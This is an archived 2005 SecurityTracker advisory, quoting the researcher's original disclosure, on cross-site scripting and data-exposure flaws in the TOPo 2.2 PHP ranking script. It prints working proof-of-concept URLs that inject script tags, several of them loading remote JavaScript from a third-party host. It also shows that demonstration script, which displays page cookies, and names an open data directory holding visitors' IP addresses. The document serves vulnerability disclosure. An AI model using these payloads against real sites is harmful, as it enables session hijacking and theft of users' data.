SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Forum/Board/Portal)  >   TOPo Vendors:   Jimenez, Emilio Jose
TOPo Input Validation Holes in 'index.php' Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014016
SecurityTracker URL:  http://securitytracker.com/id/1014016
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 20 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 2.2.178
Description:   Lostmon reported several vulnerabilities in TOPo. A remote user can conduct cross-site scripting attacks. A remote user can also obtain certain application data.

The 'index.php' script does not properly validate user-supplied input in several parameters to filter HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the TOPo software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'm', 's', 'ID', and 't' parameters are affected. Other parameters may also be affected.

Some demonstration exploit URLs are provided:

http://[target]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498

http://[target]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar

http://[target]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar

http://[target]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar

http://[target]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>

http://[target]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>

http://[target]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script>

When adding a new comment, several fields are not properly validated, including the name, web address, and e-mail address fields.

A remote user can access TOPo information by accessing files in the 'data' directly. A demonstration exploit URL is provided:

http://[target]/data/

The vendor was notified on May 19, 2005.
Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the TOPo software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user obtain application data from the 'data' directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  ej3soft.ej3.net/index.php?m=info&s=topo&t=info (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Fri, 20 May 2005 05:22:19 +0200
Subject:  TOPo 2.2 multiple variable & fields XSS and information disclosure


#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisore: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html
vendor notified: yes exploit available: yes.
#######################################################

TOPo is a free TOP system written in PHP that works
without MySQL database.TOPo is specially designed for
web sites hosted in web servers that not offer a
quality MySQL support.

TOPo contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'm','s','ID','t' and possible other parameters
upon submission to the 'index.php'script.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server,leading to a loss of integrity.

TOPo contains a flaw too that allow remote users to information disclosure.
all data are stored in '/data/' folder and all *.dat files store all votes ,
comments and other information about the site on top. Any user can download
this files and obtain all client ip address(all clients who are vote
or added a comment)

################
software use:
###############

Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet explorer 6.0 sp1 all fixes.
Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D)
Google toolbar 2.0.114.9-big/es

###########
versions:
###########

TOPo v2.2.178 vulnerable.

##############
solution
##############

no solution was available at this time.

############
time line
############

discovered: 13 may 2005
vendor notify: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005

######################
Proof of concepts XSS
######################

http://[victim]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498 

http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar

http://[victim]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>

http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>

http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script> 

#########################


Wen try to added a new comment some fields are vulnerable to XSS style attacks.

http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552

field name vulnerable, Your web field  vulnerable and your email field
are  vulnerable.


##################
example of js.js
##################

Thnx to http://www.drorshalev.com for this script and for hosting it
for this demonstration.

#################
js.js
#################

function showIt(){
document.body.innerHTML="<a
href='javascript:alert(document.cookie)'><center><b>Your PC Can be
hacked Via "+ document.domain +" XSS ,Html Injection to a Web Site
"+document.domain +" By DrorShalev.com<br></b><br><img border=0
src='http://sec.drorshalev.com/dev/injection/lig.gif' width=60
HEIGHT=60><img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp'
border=1><br></center></a>"+ document.body.innerHTML
window.status="Your PC Can be hacked Via "+ document.domain +" XSS
,Html Injection to a Web Site "+document.domain +" By DrorShalev.com"
setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')",6000);

}

setTimeout("showIt()",2000);

################
data disclosure
################

http://[victim]/data/

################ EnD #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
Thnx to http://www.drorshalev.com and dror for his script and for
hosting it !!!!
thnx to all who day after day support me !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC